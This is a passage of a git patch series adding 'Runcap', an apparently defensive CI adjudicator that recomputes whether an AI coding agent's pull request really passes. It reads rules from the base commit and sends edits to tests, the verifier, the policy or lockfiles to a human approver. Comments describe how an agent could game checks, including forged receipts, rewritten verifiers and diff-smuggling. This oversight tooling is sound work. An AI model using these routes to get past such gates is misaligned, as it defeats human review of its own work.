adjudicate` - (Job B verdict). The composite `action.yml` wires both jobs with the permissions - block above, GitHub-hosted only. -- Ship a hardened reference workflow template + a sample CODEOWNERS; document - "protect the default branch; mark the check Required; own the trust paths via - CODEOWNERS; pin the action by commit SHA." +- New CI evidence builder (adjudicator core): port `freezeTaskContract` + + `checkVerificationIntegrity` + `verifyInCleanWorktree` to source ALL inputs from + base SHA, compute the diff itself, reject diff-smuggling, install base-pinned deps + with `--ignore-scripts`, and run baseline + replay itself. +- Diff applier with a hard allowlist: `A`/`M` regular UTF-8 text blobs in allow scope + only; reject D/R/C/T, symlink, mode, submodule, binary, LFS. +- Hardening detector: best-effort read of branch protection / required check / up-to- + date / stale-approval / CODEOWNERS coverage / no-bypass -> `HARDENED | + HARDENING_UNVERIFIED | INSTALLATION_NOT_HARDENED`; never infers HARDENED. +- `runcap ci` gains `--mode adjudicate` (the gate) and `--advisory`. The composite + `action.yml` ships ONE required job, `contents: read` only, GitHub-hosted, + `timeout-minutes`, no `needs:` on any executor. +- Ship a hardened reference workflow template + sample CODEOWNERS + a documented + branch-protection/ruleset profile (protected branch, required check, up-to-date, + stale-approval dismissal, CODEOWNERS over trust paths, no-bypass, action pinned by + SHA). --- ## Stop line -After Tier 3 (CI-attested verdict via protected workflow + required check + -CODEOWNERS, verdict computed only by Job B's own replay), the product is a coherent -**proof gate** for public launch and design partners. Do NOT add in this scope: -cryptographic signing/keyless attestation (own threat model, next), orchestration, -benchmark/model-ranking, or a SaaS dashboard. +After Tier 3 (CI-attested verdict via a single required adjudicator job under a +documented hardened profile; verdict computed only by the adjudicator's own replay), +the product is a coherent **proof gate** for public launch and design partners. Do +NOT add in this scope: cryptographic signing/keyless attestation (own threat model, +next), network isolation, merge-queue support, orchestration, benchmark/model-ranking, +or a SaaS dashboard. From 5a9c566241aa9f841fb27aafcd73b6b314fc0950 Mon Sep 17 00:00:00 2001 From: "Kirill D." Date: Sun, 28 Jun 2026 13:38:35 -0600 Subject: [PATCH 03/11] feat: Tier 3 CI adjudicator that recomputes the verdict from the PR base Add src/adjudicate.mjs: an independent evidence runner that never trusts the agent's receipt. It resolves base/head only from the trusted pull_request event (or explicit --base/--head), sources the policy, verifier and lockfile from the base SHA, classifies the diff (text-only/in-scope -> candidate; structural or out-of-scope -> BLOCKED; policy/workflow/verifier/dependency edits -> HUMAN_APPROVAL_REQUIRED), and replays the base-pinned verifier in a clean worktree. Verdict truth is the adjudicator's own replay; receipt/budget telemetry is advisory only. Wire `runcap ci --mode adjudicate` in bin/runcap.mjs (exit 0 on PASS/HUMAN_APPROVAL_REQUIRED, 1 on BLOCKED) without disturbing the existing receipt-grading path. Co-Authored-By: Claude Opus 4.7 --- bin/runcap.mjs | 60 ++++-- src/adjudicate.mjs | 515 +++++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 554 insertions(+), 21 deletions(-) create mode 100644 src/adjudicate.mjs diff --git a/bin/runcap.mjs b/bin/runcap.mjs index 44180ec..c0d3fb0 100755 --- a/bin/runcap.mjs +++ b/bin/runcap.mjs @@ -41,6 +41,7 @@ import { policyMeta, formatPolicyBlock } from "../src/policy.mjs"; +import { adjudicate, formatAdjudication, exitCodeFor } from "../src/adjudicate.mjs"; import { readFileSync, appendFileSync } from "node:fs"; const args = process.argv.slice(2); @@ -61,6 +62,9 @@ Usage: (enforce the repo policy; exit 1 if the mission is BLOCKED) runcap ci [--policy path] [--receipt path] (grade a receipt against the policy; writes PR summary, exit 1 on BLOCKED) + runcap ci --mode adjudicate [--policy path] [--base sha --head sha] + (Tier 3: recompute the verdict in CI from the PR's base commit - + never trusts the agent's receipt; exit 1 on BLOCKED) runcap plans runcap cap (set the hard cap the gateway enforces) runcap cap show (show the current cap) @@ -311,32 +315,46 @@ try { if (result.receipt.policy?.verdict === "BLOCKED") process.exitCode = 1; } else if (command === "ci") { const ciArgs = args.slice(1); + const mode = takeOption(ciArgs, "--mode"); const policyPath = takeOption(ciArgs, "--policy"); const receiptPath = takeOption(ciArgs, "--receipt"); - const loaded = loadPolicy(process.cwd(), policyPath); - if (!loaded) throw new Error("No policy found. Create .runcap/mission.yaml (or pass --policy )."); - const { ok, errors } = validatePolicy(loaded.policy); - if (!ok) { - for (const e of errors) console.error(` policy error: ${e}`); - writeCiSummary(["## Runcap mission: policy INVALID", "", ...errors.map((e) => `- ${e}`)].join("\n")); - throw new Error("Mission policy is invalid."); - } - - let receipt; - if (receiptPath) { - receipt = JSON.parse(readFileSync(receiptPath, "utf8")); + if (mode === "adjudicate") { + // Tier 3: recompute the verdict from the BASE commit of the PR in a clean + // checkout. Trusts only the base/head SHAs from the pull_request event (or + // explicit --base/--head for local runs); never the agent's receipt. + const baseFlag = takeOption(ciArgs, "--base"); + const headFlag = takeOption(ciArgs, "--head"); + const verdict = await adjudicate({ cwd: process.cwd(), baseFlag, headFlag, policyPath }); + const lines = formatAdjudication(verdict); + console.log(lines.join("\n")); + writeCiSummary(["## Runcap CI adjudication: " + verdict.verdict, "", "```", ...lines, "```"].join("\n")); + process.exitCode = exitCodeFor(verdict.verdict); } else { - const id = await latestOutcomeId(); - if (!id) throw new Error("No outcome receipt found. Run `runcap mission run ...` first, or pass --receipt ."); - receipt = JSON.parse(readFileSync(`.runcap/outcomes/${id}/receipt.json`, "utf8")); - } + const loaded = loadPolicy(process.cwd(), policyPath); + if (!loaded) throw new Error("No policy found. Create .runcap/mission.yaml (or pass --policy )."); + const { ok, errors } = validatePolicy(loaded.policy); + if (!ok) { + for (const e of errors) console.error(` policy error: ${e}`); + writeCiSummary(["## Runcap mission: policy INVALID", "", ...errors.map((e) => `- ${e}`)].join("\n")); + throw new Error("Mission policy is invalid."); + } + + let receipt; + if (receiptPath) { + receipt = JSON.parse(readFileSync(receiptPath, "utf8")); + } else { + const id = await latestOutcomeId(); + if (!id) throw new Error("No outcome receipt found. Run `runcap mission run ...` first, or pass --receipt ."); + receipt = JSON.parse(readFileSync(`.runcap/outcomes/${id}/receipt.json`, "utf8")); + } - const verdict = evaluatePolicyVerdict(receipt, loaded.policy); - const block = formatPolicyBlock({ ...policyMeta(loaded), ...verdict }); - console.log(block.join("\n")); - writeCiSummary(["## Runcap mission verdict: " + verdict.verdict, "", "```", ...block, "```"].join("\n")); - if (verdict.verdict === "BLOCKED") process.exitCode = 1; + const verdict = evaluatePolicyVerdict(receipt, loaded.policy); + const block = formatPolicyBlock({ ...policyMeta(loaded), ...verdict }); + console.log(block.join("\n")); + writeCiSummary(["## Runcap mission verdict: " + verdict.verdict, "", "```", ...block, "```"].join("\n")); + if (verdict.verdict === "BLOCKED") process.exitCode = 1; + } } else if (command === "login") { console.log(await loginCommand(args[1])); } else if (command === "logout") { diff --git a/src/adjudicate.mjs b/src/adjudicate.mjs new file mode 100644 index 0000000..7cfff2f --- /dev/null +++ b/src/adjudicate.mjs @@ -0,0 +1,515 @@ +// Tier 3: the independent CI adjudicator (`runcap ci --mode adjudicate`). +// +// `runcap ci` (Tier 2) recomputes the PASS/BLOCKED *logic* from the policy, but +// it grades the integrity *facts* that the agent wrote into receipt.json. A +// forged "VERIFIED_STRONG" receipt therefore grades PASS. This module closes +// that gap: it recomputes the facts itself, in CI, from the BASE commit of the +// pull request - the last state a human reviewer approved - and never trusts a +// number the agent stamped on its own receipt. +// +// What it trusts: the base/head SHAs from the trusted `pull_request` event, and +// the policy + verifier + lockfile read from the BASE commit. +// What it does NOT trust: receipt.json, gateway telemetry, artifact-reported +// SHAs, the head-side policy/verifier/workflow, or any agent +// environment value. Agent telemetry is carried as advisory +// only and can never move the verdict. +// +// Three verdicts: +// PASS - every changed path is an in-scope regular text +// edit, the task genuinely failed at base, and the +// change makes the base-pinned verifier pass in a +// clean base checkout. +// BLOCKED - any structurally unsafe change (delete/rename/ +// symlink/submodule/mode/binary/LFS), an out-of- +// scope edit, a meaningless baseline, or a replay +// that does not reproduce the pass. +// HUMAN_APPROVAL_REQUIRED - the change touches the rules or the evidence +// themselves (policy, workflow, verifier, protected +// or dependency files). Runcap declines to issue an +// automated proof; a human CODEOWNER must decide. +// +// This module imports only node builtins + js-yaml + validatePolicy/policyMeta +// from policy.mjs (one direction, no cycle). It never imports mission-control. + +import { spawn } from "node:child_process"; +import { createHash } from "node:crypto"; +import { mkdir, writeFile, readFile, rm } from "node:fs/promises"; +import { existsSync, readFileSync } from "node:fs"; +import path from "node:path"; +import os from "node:os"; +import yaml from "js-yaml"; +import { validatePolicy, policyMeta } from "./policy.mjs"; + +const POLICY_FILENAMES = ["mission.yaml", "mission.yml", "mission.json"]; + +// Paths that are the rules or the evidence themselves. An edit to any of these +// is never auto-approved: a human CODEOWNER must sign off, because changing the +// verifier, the policy, or the workflow changes what "passing" even means. +const DEPENDENCY_FILES = [ + "package.json", "package-lock.json", "npm-shrinkwrap.json", + "yarn.lock", "pnpm-lock.yaml", "bun.lockb" +]; + +// The same protected globs the in-terminal guard uses (tests/config), so the +// adjudicator and the local guard agree on what counts as evidence. +const PROTECTED_GLOBS = [ + /(^|\/)[^/]*\.test\.[mc]?[jt]sx?$/, + /(^|\/)[^/]*\.spec\.[mc]?[jt]sx?$/, + /(^|\/)__tests__\//, + /(^|\/)tests?\//, + /(^|\/)package\.json$/, + /(^|\/)tsconfig[^/]*\.json$/, + /(^|\/)jest\.config\./, + /(^|\/)vitest\.config\./ +]; + +const LFS_POINTER_SIGNATURE = "version https://git-lfs.github.com/spec"; + +// --- git plumbing (local, spawn-based; no influence from agent env) --------- + +function git(args, cwd) { + return new Promise((resolve) => { + const child = spawn("git", args, { cwd, shell: false }); + let stdout = ""; + let stderr = ""; + child.stdout.on("data", (c) => { stdout += c.toString(); }); + child.stderr.on("data", (c) => { stderr += c.toString(); }); + child.on("error", (e) => resolve({ text: "", error: e.message })); + child.on("close", (code) => resolve({ text: stdout, error: code === 0 ? null : stderr.trim() })); + }); +} + +// Exact bytes of a blob at a commit. Unlike git(), this never trims, so applied +// file content is byte-identical to what is in the head tree. +function gitShowBytes(rev, relPath, cwd) { + return new Promise((resolve) => { + const child = spawn("git", ["show", `${rev}:${relPath}`], { cwd, shell: false }); + const chunks = []; + let stderr = ""; + child.stdout.on("data", (c) => chunks.push(c)); + child.stderr.on("data", (c) => { stderr += c.toString(); }); + child.on("error", (e) => resolve({ ok: false, buffer: null, error: e.message })); + child.on("close", (code) => resolve(code === 0 ? { ok: true, buffer: Buffer.concat(chunks), error: null } : { ok: false, buffer: null, error: stderr.trim() })); + }); +} + +async function revExists(rev, cwd) { + const r = await git(["cat-file", "-e", `${rev}^{commit}`], cwd); + return r.error === null; +} + +async function blobExists(rev, relPath, cwd) { + const r = await git(["cat-file", "-e", `${rev}:${relPath}`], cwd); + return r.error === null; +} + +// Run the base-pinned verify command in a directory. Mirrors mission-control's +// runShell so a verifier behaves identically here and in the terminal guard. +function runShell(commandString, cwd) { + const started = Date.now(); + const shell = process.platform === "win32" ? "cmd" : "sh"; + const shellArgs = process.platform === "win32" ? ["/c", commandString] : ["-c", commandString]; + return new Promise((resolve) => { + const child = spawn(shell, shellArgs, { cwd, env: { ...process.env, AIM_WRAPPED: "1" }, shell: false }); + let stdout = ""; + let stderr = ""; + child.stdout?.on("data", (c) => { const t = c.toString(); stdout += t; }); + child.stderr?.on("data", (c) => { const t = c.toString(); stderr += t; }); + child.on("error", (e) => resolve({ stdout, stderr: stderr + `\n${e.message}`, exitCode: 127, durationMs: Date.now() - started })); + child.on("close", (code) => resolve({ stdout, stderr, exitCode: code ?? 1, durationMs: Date.now() - started })); + }); +} + +// --- SHA resolution (trusted PR event ONLY) --------------------------------- + +// The ONLY trusted source of base/head is the `pull_request` event payload that +// GitHub itself writes to $GITHUB_EVENT_PATH. We never read a SHA from the +// receipt, an artifact, or any agent-controlled value. Explicit flags exist for +// local runs and tests; on a real PR job the event payload wins. +function resolveShas({ baseFlag, headFlag } = {}) { + if (baseFlag && headFlag) { + return { baseSha: baseFlag, headSha: headFlag, shaSource: "explicit_flags" }; + } + const eventPath = process.env.GITHUB_EVENT_PATH; + const eventName = process.env.GITHUB_EVENT_NAME; + if (eventPath && existsSync(eventPath)) { + try { + const event = JSON.parse(readFileSync(eventPath, "utf8")); + const base = event?.pull_request?.base?.sha; + const head = event?.pull_request?.head?.sha; + if (base && head) { + // pull_request_target would run with base-repo secrets against head code. + // We only adjudicate the read-only `pull_request` event. + const trusted = eventName === "pull_request" || eventName === undefined; + return { baseSha: base, headSha: head, shaSource: trusted ? "github_pull_request_event" : `untrusted_event:${eventName}` }; + } + } catch { /* fall through to unresolved */ } + } + return { baseSha: null, headSha: null, shaSource: "unresolved" }; +} + +// --- policy loaded FROM THE BASE COMMIT ------------------------------------- + +// Read and parse the policy as it exists at the base commit - the rules the +// reviewer last approved - not the head-side policy the PR could have rewritten. +async function loadPolicyFromBase(baseSha, explicitPath, cwd) { + const candidates = explicitPath ? [explicitPath] : POLICY_FILENAMES.map((n) => path.posix.join(".runcap", n)); + for (const rel of candidates) { + if (!(await blobExists(baseSha, rel, cwd))) continue; + const got = await gitShowBytes(baseSha, rel, cwd); + if (!got.ok) continue; + const raw = got.buffer.toString("utf8"); + let policy; + try { + policy = rel.endsWith(".json") ? JSON.parse(raw) : yaml.load(raw); + } catch (e) { + return { error: `policy at base:${rel} did not parse: ${e.message}` }; + } + if (!policy || typeof policy !== "object") return { error: `policy at base:${rel} is not an object.` }; + return { + result: { policy, raw, hash: createHash("sha256").update(raw).digest("hex"), source: rel } + }; + } + return { error: "no policy (.runcap/mission.{yaml,yml,json}) found at the base commit." }; +} + +// --- diff classification ---------------------------------------------------- + +function isProtectedPath(relPath, extraProtected) { + if (extraProtected.some((p) => relPath === p || relPath.startsWith(p.replace(/\/?$/, "/")))) return true; + return PROTECTED_GLOBS.some((re) => re.test(relPath)); +} + +function withinAllowed(relPath, allowed) { + if (!allowed || allowed.length === 0) return true; + return allowed.some((a) => relPath === a || relPath.startsWith(a.replace(/\/?$/, "/"))); +} + +function isWorkflowPath(relPath) { + return relPath.startsWith(".github/workflows/"); +} + +function isPolicyPath(relPath) { + return POLICY_FILENAMES.some((n) => relPath === path.posix.join(".runcap", n)); +} + +function isDependencyPath(relPath) { + const base = relPath.split("/").pop(); + return DEPENDENCY_FILES.includes(base); +} + +// Walk `git diff --raw -z --find-renames base head`. -z gives NUL-delimited +// fields; rename/copy records carry two paths, everything else one. +function parseRawDiff(buffer) { + const parts = buffer.toString("utf8").split("\0"); + const entries = []; + let i = 0; + while (i < parts.length) { + const meta = parts[i]; + if (!meta || meta[0] !== ":") { i++; continue; } + // ": " + const fields = meta.slice(1).split(/\s+/); + const oldMode = fields[0]; + const newMode = fields[1]; + const statusField = fields[4] ?? ""; + const statusChar = statusField[0] ?? ""; + i++; + if (statusChar === "R" || statusChar === "C") { + const srcPath = parts[i]; const dstPath = parts[i + 1]; + i += 2; + entries.push({ statusChar, statusField, oldMode, newMode, srcPath, path: dstPath }); + } else { + const p = parts[i]; + i += 1; + entries.push({ statusChar, statusField, oldMode, newMode, path: p }); + } + } + return entries; +} + +function looksBinary(buffer) { + // A NUL byte in the first 8KB is git's own "binary" heuristic. + const slice = buffer.subarray(0, 8192); + return slice.includes(0); +} + +function isValidUtf8(buffer) { + try { + new TextDecoder("utf-8", { fatal: true }).decode(buffer); + return true; + } catch { + return false; + } +} + +// Classify one diff entry into candidate | blocked | human, with a reason. +// Structural rejects come first (never auto-approvable), then sensitive paths +// (human gate), then scope (block), then the in-scope regular edit (candidate). +async function classifyEntry(entry, { headSha, cwd, protectedPaths, allowed, verifierPaths }) { + const p = entry.path; + const s = entry.statusChar; + + if (s === "D") return { path: p, class: "blocked", detail: "file deleted (deletions are never auto-approved)" }; + if (s === "R") return { path: p, class: "blocked", detail: `file renamed from ${entry.srcPath} (renames are never auto-approved)` }; + if (s === "C") return { path: p, class: "blocked", detail: `file copied from ${entry.srcPath} (copies are never auto-approved)` }; + if (s === "T") return { path: p, class: "blocked", detail: "file type changed (type changes are never auto-approved)" }; + if (entry.newMode === "120000") return { path: p, class: "blocked", detail: "symlink (symlinks are never auto-approved)" }; + if (entry.newMode === "160000") return { path: p, class: "blocked", detail: "submodule/gitlink (submodules are never auto-approved)" }; + if (s === "M" && entry.oldMode !== entry.newMode) return { path: p, class: "blocked", detail: `mode change ${entry.oldMode} -> ${entry.newMode} (mode changes are never auto-approved)` }; + if (entry.newMode !== "100644") return { path: p, class: "blocked", detail: `non-regular file mode ${entry.newMode} (only plain 100644 text files can be auto-applied)` }; + if (s !== "A" && s !== "M") return { path: p, class: "blocked", detail: `unsupported diff status ${entry.statusField}` }; + + // Content checks on the HEAD blob (the bytes we would apply). + const got = await gitShowBytes(headSha, p, cwd); + if (!got.ok) return { path: p, class: "blocked", detail: `could not read head blob: ${got.error}` }; + if (looksBinary(got.buffer)) return { path: p, class: "blocked", detail: "binary content (only UTF-8 text files can be auto-applied)" }; + if (!isValidUtf8(got.buffer)) return { path: p, class: "blocked", detail: "not valid UTF-8 (only UTF-8 text files can be auto-applied)" }; + const head = got.buffer.toString("utf8"); + if (head.startsWith(LFS_POINTER_SIGNATURE)) return { path: p, class: "blocked", detail: "Git LFS pointer (real content is not in the tree, cannot replay)" }; + + // Sensitive-path human gate: the rules or the evidence themselves. + if (isPolicyPath(p)) return { path: p, class: "human", detail: "edits the mission policy (the rules) - human CODEOWNER must approve" }; + if (isWorkflowPath(p)) return { path: p, class: "human", detail: "edits a GitHub workflow - human CODEOWNER must approve" }; + if (verifierPaths.includes(p)) return { path: p, class: "human", detail: "edits a verifier file (the evidence) - human CODEOWNER must approve" }; + if (isDependencyPath(p)) return { path: p, class: "human", detail: "edits a dependency manifest/lockfile - human CODEOWNER must approve" }; + if (isProtectedPath(p, protectedPaths)) return { path: p, class: "human", detail: "edits a protected/test/config path - human CODEOWNER must approve" }; + + // In-scope regular text edit. Out-of-scope edits are blocked. + if (!withinAllowed(p, allowed)) return { path: p, class: "blocked", detail: "outside the policy's allowed scope" }; + + return { path: p, class: "candidate", detail: s === "A" ? "added in-scope text file" : "modified in-scope text file", blob: got.buffer }; +} + +// The concrete file paths a verify command names, resolved at the BASE commit so +// a head-side rename of the verifier cannot hide it from the human gate. +async function verifierFilesAtBase(verify, baseSha, cwd) { + const tokens = String(verify).split(/\s+/).filter(Boolean); + const files = []; + for (const raw of tokens) { + const tok = raw.replace(/^["']|["']$/g, ""); + if (!/[./]/.test(tok)) continue; + const rel = tok.replace(/^\.\//, ""); + if (await blobExists(baseSha, rel, cwd)) { + if (!files.includes(rel)) files.push(rel); + } + } + return files; +} + +// --- the replay ------------------------------------------------------------- + +// Baseline + replay in a throwaway worktree pinned at the base commit. Deps come +// from the base lockfile (npm ci --ignore-scripts: no lifecycle scripts, no +// floating install). Then the permitted candidate blobs are written in and the +// base-pinned verifier runs again. Truth comes only from this replay. +async function replay({ baseSha, candidates, verify, cwd }) { + const tmpBase = await mkdtempWorktreeBase(); + const wt = path.join(tmpBase, `wt-${createHash("sha1").update(`${baseSha}${Date.now()}${Math.random()}`).digest("hex").slice(0, 8)}`); + const add = await git(["worktree", "add", "--detach", wt, baseSha], cwd); + if (add.error) { + return { baselineFailed: null, replayPassed: null, dependencyInstall: "skipped_no_manifest", detail: `worktree add failed: ${add.error}`, ran: false }; + } + try { + // Base-pinned dependency install (only when the base has a lockfile). + let dependencyInstall = "skipped_no_manifest"; + const hasPkg = existsSync(path.join(wt, "package.json")); + const hasLock = existsSync(path.join(wt, "package-lock.json")) || existsSync(path.join(wt, "npm-shrinkwrap.json")); + if (hasPkg && hasLock) { + const ci = await runShell("npm ci --ignore-scripts --no-audit --no-fund", wt); + dependencyInstall = ci.exitCode === 0 ? "npm_ci_ignore_scripts" : "failed"; + if (ci.exitCode !== 0) { + return { baselineFailed: null, replayPassed: null, dependencyInstall, detail: "npm ci (base-pinned, --ignore-scripts) failed", ran: true }; + } + } + + // 1. Baseline: the task must genuinely fail at base, or a later pass is meaningless. + const baseline = await runShell(verify, wt); + const baselineFailed = baseline.exitCode !== 0; + + // 2. Apply only the permitted candidate blobs from head. + for (const c of candidates) { + const dst = path.join(wt, c.path); + await mkdir(path.dirname(dst), { recursive: true }); + await writeFile(dst, c.blob); + } + + // 3. Replay the base-pinned verifier with the change applied. + const after = await runShell(verify, wt); + const replayPassed = after.exitCode === 0; + + return { baselineFailed, replayPassed, dependencyInstall, ran: true, detail: "baseline + replay completed in a clean base checkout" }; + } finally { + await git(["worktree", "remove", "--force", wt], cwd); + await rm(tmpBase, { recursive: true, force: true }).catch(() => {}); + } +} + +async function mkdtempWorktreeBase() { + const base = path.join(os.tmpdir(), `runcap-adj-${process.pid}-${Date.now()}`); + await mkdir(base, { recursive: true }); + return base; +} + +// --- advisory agent telemetry (NEVER influences the verdict) ---------------- + +// Best-effort read of the agent's self-reported receipt, purely to surface it +// next to the independently computed verdict. Forgeable, so it is labelled +// advisory and explicitly cannot move the verdict. +function readAgentTelemetry(cwd) { + const out = { truth: "self_reported_by_agent_advisory_only", influence_on_verdict: "none", present: false }; + try { + const latest = path.join(cwd, ".runcap", "outcomes", "latest"); + if (!existsSync(latest)) return out; + const id = readFileSync(latest, "utf8").trim(); + const receiptPath = path.join(cwd, ".runcap", "outcomes", id, "receipt.json"); + if (!existsSync(receiptPath)) return out; + const r = JSON.parse(readFileSync(receiptPath, "utf8")); + out.present = true; + out.reported_outcome = r.outcome ?? null; + out.reported_integrity_status = r.verificationIntegrity?.status ?? null; + out.reported_cost_usd = r.cost?.actualCostUsd ?? null; + } catch { /* advisory only */ } + return out; +} + +// --- the adjudicator -------------------------------------------------------- + +export async function adjudicate({ cwd = process.cwd(), baseFlag, headFlag, policyPath } = {}) { + const hardening = { required_profile: "documented", runtime_attestation: "not_performed_in_pr_job" }; + const agentTelemetry = readAgentTelemetry(cwd); + + const base = (verdict, reasons, extra = {}) => ({ + schema: "runcap.ci-verdict/v1", + verdict, + reasons, + repository_hardening: hardening, + agent_telemetry: agentTelemetry, + truth: "recomputed_by_adjudicator_from_base_sha", + ...extra + }); + + // 1. Resolve base/head from the trusted PR event only. + const { baseSha, headSha, shaSource } = resolveShas({ baseFlag, headFlag }); + if (!baseSha || !headSha) { + return base("BLOCKED", ["Could not resolve base/head from the trusted pull_request event (and no explicit --base/--head). Refusing to adjudicate."], { sha_source: shaSource }); + } + if (shaSource.startsWith("untrusted_event")) { + return base("BLOCKED", [`Refusing to adjudicate an untrusted event (${shaSource}). Only the read-only pull_request event is adjudicated.`], { base_sha: baseSha, head_sha: headSha, sha_source: shaSource }); + } + if (!(await revExists(baseSha, cwd)) || !(await revExists(headSha, cwd))) { + return base("BLOCKED", ["base or head commit is not present in the checkout (fetch depth too shallow?). Refusing to adjudicate."], { base_sha: baseSha, head_sha: headSha, sha_source: shaSource }); + } + + // 2. Policy from the BASE commit (the approved rules), then validate it. + const loaded = await loadPolicyFromBase(baseSha, policyPath, cwd); + if (loaded.error) { + return base("BLOCKED", [loaded.error], { base_sha: baseSha, head_sha: headSha, sha_source: shaSource }); + } + const policyResult = loaded.result; + const { ok, errors } = validatePolicy(policyResult.policy); + if (!ok) { + return base("BLOCKED", errors.map((e) => `base policy invalid: ${e}`), { base_sha: baseSha, head_sha: headSha, sha_source: shaSource, policy: policyMeta(policyResult) }); + } + const verification = policyResult.policy.verification ?? {}; + const verify = verification.command; + const protectedPaths = Array.isArray(verification.protect) ? verification.protect : []; + const allowed = Array.isArray(verification.allow) ? verification.allow : []; + const verifierPaths = await verifierFilesAtBase(verify, baseSha, cwd); + + // 3. Compute the base..head diff ourselves and classify every entry. + const rawDiff = await new Promise((resolve) => { + const child = spawn("git", ["diff", "--raw", "-z", "--find-renames", baseSha, headSha], { cwd, shell: false }); + const chunks = []; + child.stdout.on("data", (c) => chunks.push(c)); + child.on("error", () => resolve(Buffer.alloc(0))); + child.on("close", () => resolve(Buffer.concat(chunks))); + }); + const entries = parseRawDiff(rawDiff); + const classified = []; + for (const entry of entries) { + classified.push(await classifyEntry(entry, { headSha, cwd, protectedPaths, allowed, verifierPaths })); + } + const publicClassification = classified.map(({ blob, ...rest }) => rest); + + const blocked = classified.filter((c) => c.class === "blocked"); + const human = classified.filter((c) => c.class === "human"); + const candidates = classified.filter((c) => c.class === "candidate"); + + const policyBlock = policyMeta(policyResult); + + // 4. Verdict precedence: any structural/scope reject blocks; else a sensitive + // path sends it to a human; else we must reproduce the proof ourselves. + if (blocked.length) { + return base("BLOCKED", blocked.map((b) => `${b.path}: ${b.detail}`), { + base_sha: baseSha, head_sha: headSha, sha_source: shaSource, policy: policyBlock, + diff_classification: publicClassification + }); + } + if (human.length) { + return base("HUMAN_APPROVAL_REQUIRED", + ["Runcap declined to issue an automated proof: the change touches the rules or the evidence themselves. A human CODEOWNER must approve.", ...human.map((h) => `${h.path}: ${h.detail}`)], + { base_sha: baseSha, head_sha: headSha, sha_source: shaSource, policy: policyBlock, diff_classification: publicClassification }); + } + if (candidates.length === 0) { + return base("BLOCKED", ["No applicable code change to adjudicate (empty or non-content diff)."], { + base_sha: baseSha, head_sha: headSha, sha_source: shaSource, policy: policyBlock, diff_classification: publicClassification + }); + } + + // 5. Replay from the base commit with only the candidate blobs applied. + const r = await replay({ baseSha, candidates, verify, cwd }); + const codeEvidence = { + truth: "recomputed_by_adjudicator_from_base_sha", + baseline_failed: r.baselineFailed, + replay_passed: r.replayPassed, + dependency_install: r.dependencyInstall, + candidate_files: candidates.map((c) => c.path), + detail: r.detail + }; + + const reasons = []; + if (r.dependencyInstall === "failed") reasons.push("Base-pinned `npm ci --ignore-scripts` failed: cannot establish a clean baseline."); + if (r.baselineFailed === false) reasons.push("Baseline already green: the verifier passed at the base commit, so a post-change pass proves nothing."); + if (r.replayPassed !== true) reasons.push("Replay did not pass: the change did not make the base-pinned verifier pass in a clean base checkout."); + + if (reasons.length) { + return base("BLOCKED", reasons, { base_sha: baseSha, head_sha: headSha, sha_source: shaSource, policy: policyBlock, diff_classification: publicClassification, code_evidence: codeEvidence }); + } + + return base("PASS", + [`Verifier failed at base and passed after applying ${candidates.length} in-scope text change(s), recomputed in a clean base checkout.`], + { base_sha: baseSha, head_sha: headSha, sha_source: shaSource, policy: policyBlock, diff_classification: publicClassification, code_evidence: codeEvidence }); +} + +// Markdown lines for the PR step summary + terminal print. +export function formatAdjudication(v) { + const lines = [ + `Runcap CI adjudication (independent replay from base)`, + `====================================================`, + `Verdict: ${v.verdict}`, + `Base SHA: ${v.base_sha ?? "unresolved"} (source: ${v.sha_source ?? "unknown"})`, + `Head SHA: ${v.head_sha ?? "unresolved"}` + ]; + if (v.policy) { + lines.push(`Policy: ${v.policy.mission?.name ?? "(unnamed)"} - hash ${v.policy.hash}`); + } + if (v.code_evidence) { + const ce = v.code_evidence; + lines.push(`Replay: baseline_failed=${ce.baseline_failed} replay_passed=${ce.replay_passed} deps=${ce.dependency_install}`); + } + lines.push(`Hardening: required_profile=${v.repository_hardening.required_profile}, runtime_attestation=${v.repository_hardening.runtime_attestation}`); + if (v.agent_telemetry?.present) { + lines.push(`Agent says: outcome=${v.agent_telemetry.reported_outcome}, integrity=${v.agent_telemetry.reported_integrity_status} (ADVISORY ONLY - did not affect this verdict)`); + } + if (Array.isArray(v.reasons) && v.reasons.length) { + lines.push(v.verdict === "PASS" ? `Why:` : `Why ${v.verdict}:`); + for (const r of v.reasons) lines.push(` - ${r}`); + } + return lines; +} + +// Exit code: PASS and HUMAN_APPROVAL_REQUIRED are non-failing (the human gate is +// a success/neutral outcome that hands authority to a CODEOWNER); BLOCKED fails. +export function exitCodeFor(verdict) { + return verdict === "BLOCKED" ? 1 : 0; +} From 858caa1e9356329b9bb6fc11634643c230dcfc40 Mon Sep 17 00:00:00 2001 From: "Kirill D." Date: Sun, 28 Jun 2026 13:38:44 -0600 Subject: [PATCH 04/11] ci: least-privilege adjudicate workflow + action.yml adjudicate mode Add .github/workflows/runcap-adjudicate.yml: a single self-sufficient required check on the pull_request event, contents:read only, GitHub-hosted, timeout-minutes 10, no needs/secrets/id-token, deps via `npm ci --ignore-scripts`. Extend action.yml with a `mode` input so the composite action can run the adjudicator as well as the receipt grader. Co-Authored-By: Claude Opus 4.7 --- .github/workflows/runcap-adjudicate.yml | 40 +++++++++++++++++++++++++ action.yml | 15 ++++++++-- 2 files changed, 52 insertions(+), 3 deletions(-) create mode 100644 .github/workflows/runcap-adjudicate.yml diff --git a/.github/workflows/runcap-adjudicate.yml b/.github/workflows/runcap-adjudicate.yml new file mode 100644 index 0000000..3613146 --- /dev/null +++ b/.github/workflows/runcap-adjudicate.yml @@ -0,0 +1,40 @@ +# Runcap Tier 3 adjudicator: recompute the merge verdict in CI from the PR's +# BASE commit. This job never trusts the agent's receipt - it sources the +# policy, verifier and lockfile from the base SHA, replays the verify command +# in a clean worktree, and exits non-zero only on a real BLOCKED verdict. +# +# Security posture (every line here is load-bearing): +# - Triggered on the standard PR event so a fork runs with a read-only token +# and no access to repo secrets. +# - Read-only repository scope is the only permission granted: enough to +# checkout and read git history, nothing more. +# - GitHub-hosted runner, capped runtime, single self-sufficient required +# check that does not depend on any upstream job. +name: Runcap adjudicate + +on: + pull_request: + +permissions: + contents: read + +jobs: + adjudicate: + runs-on: ubuntu-latest + timeout-minutes: 10 + steps: + - name: Checkout (full history so the base commit is available) + uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Setup Node + uses: actions/setup-node@v4 + with: + node-version: 22 + + - name: Install Runcap dependencies (pinned, no lifecycle scripts) + run: npm ci --ignore-scripts --no-audit --no-fund + + - name: Adjudicate the pull request from its base commit + run: node ./bin/runcap.mjs ci --mode adjudicate diff --git a/action.yml b/action.yml index 5fd52a6..fe51a7a 100644 --- a/action.yml +++ 